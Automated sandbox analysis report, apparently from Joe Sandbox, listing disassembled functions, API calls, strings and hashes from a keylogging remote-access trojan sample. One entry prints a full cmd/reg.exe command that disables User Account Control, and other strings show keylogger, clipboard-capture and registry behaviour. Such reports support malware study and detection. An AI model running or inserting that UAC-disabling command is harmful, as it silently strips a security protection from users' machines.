                        • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                        • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                        • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                        Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                        • _free.LIBCMT ref: 00446F06
                        • _free.LIBCMT ref: 00446F2E
                        • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                        • _abort.LIBCMT ref: 00446F4D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                        • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                        • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                        • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                        Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                        • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                        • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                        • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                        Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                        • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                        • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                        • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                        Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                        • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                        • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                        • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                        Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Enum$InfoQueryValue
                        • String ID: [regsplt]$DG
                        • API String ID: 3554306468-1089238109
                        • Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                        • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                        • Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                        • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                        Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                        • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                        • API String ID: 2974294136-4018440003
                        • Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                        • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                        • Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                        • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                        Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                        • wsprintfW.USER32 ref: 0040A905
                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: EventLocalTimewsprintf
                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                        • API String ID: 1497725170-248792730
                        • Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                        • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                        • Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                        • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                        Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSizeSleep
                        • String ID: `AG
                        • API String ID: 1958988193-3058481221
                        • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                        • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                        Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                        • GetLastError.KERNEL32 ref: 0041CAA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassCreateErrorLastRegisterWindow
                        • String ID: 0$MsgWindowClass
                        • API String ID: 2877667751-2410386613
                        • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                        • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                        • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                        • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                        Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                        • CloseHandle.KERNEL32(?), ref: 00406A14
                        Strings
                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreateProcess
                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                        • API String ID: 2922976086-4183131282
                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                        • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                        • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                        Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                        • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                        • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                        Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: pth_unenc$BG
                        • API String ID: 1818849710-2233081382
                        • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                        • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                        Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                        • String ID: KeepAlive | Disabled
                        • API String ID: 2993684571-305739064
                        • Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                        • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                        • Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                        • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                        Function 00419F42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                        • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                        • Sleep.KERNEL32(00002710), ref: 00419F89
                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: PlaySound$HandleLocalModuleSleepTime
                        • String ID: Alarm triggered
                        • API String ID: 614609389-2816303416
                        • Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                        • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                        • Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                        • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                        Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                        Strings
                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                        • API String ID: 3024135584-2418719853
                        • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                        • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                        Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                        • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                        • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                        • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                        Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                        • String ID:
                        • API String ID: 3525466593-0
                        • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                        • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                        • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                        • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                        Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                        • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                          • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 4269425633-0
                        • Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                        • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                        • Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                        • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                        Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                        • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                        • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                        Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                        • __alloca_probe_16.LIBCMT ref: 0044FF68
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                        • __freea.LIBCMT ref: 0044FFD4
